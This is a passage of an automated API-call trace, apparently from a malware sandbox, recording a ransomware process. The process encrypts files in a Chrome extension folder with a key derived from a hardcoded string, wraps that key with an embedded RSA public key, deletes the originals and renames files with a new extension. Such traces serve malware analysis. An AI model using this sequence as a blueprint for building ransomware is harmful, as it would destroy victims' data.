CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.872] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.872] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.872] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.872] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.873] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.873] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.873] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.873] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.873] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.873] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.873] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.873] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.873] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.873] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.873] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.873] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.873] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.874] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.874] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.874] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.874] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.874] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.874] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.874] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.874] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.874] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.874] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.874] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.874] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.874] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.874] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.875] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.875] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.875] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.875] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0xa8, lpOverlapped=0x0) returned 1 [0261.875] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0xa8, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0xb0) returned 1 [0261.875] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0xb0, lpOverlapped=0x0) returned 1 [0261.875] CloseHandle (hObject=0x5d50) returned 1 [0261.875] CloseHandle (hObject=0x5d64) returned 1 [0261.875] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), bFailIfExists=0) returned 1 [0261.879] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html", dwFileAttributes=0x0) returned 1 [0261.879] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.gsg")) returned 1 [0261.881] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.fuck")) returned 1 [0261.882] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0261.882] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0261.882] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.882] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.883] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0261.883] GetLastError () returned 0x0 [0261.883] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js")) returned 0x20 [0261.883] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js", dwFileAttributes=0x80) returned 1 [0261.884] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.885] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.885] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.gsg", dwFileAttributes=0x2) returned 1 [0261.886] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0261.889] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0261.889] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0261.889] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.889] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0261.889] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.889] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0261.889] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e72f98) returned 1 [0261.890] CryptImportPublicKeyInfo (in: hCryptProv=0x2e72f98, dwCertEncodingType=0x1, pInfo=0x2eab880*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eab8b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eab8b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7df40) returned 1 [0261.890] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0261.890] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e73680*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e73680*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0261.890] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e73680*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e73680*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0261.891] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.902] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.903] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.911] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.911] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.911] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.911] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.911] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.911] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.911] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.911] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.911] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.911] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.912] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.912] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.912] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.912] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.912] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.912] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.912] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.912] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.912] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.912] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.912] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.912] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.912] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.912] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.912] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.912] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.912] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.913] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.913] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.913] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.913] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.913] 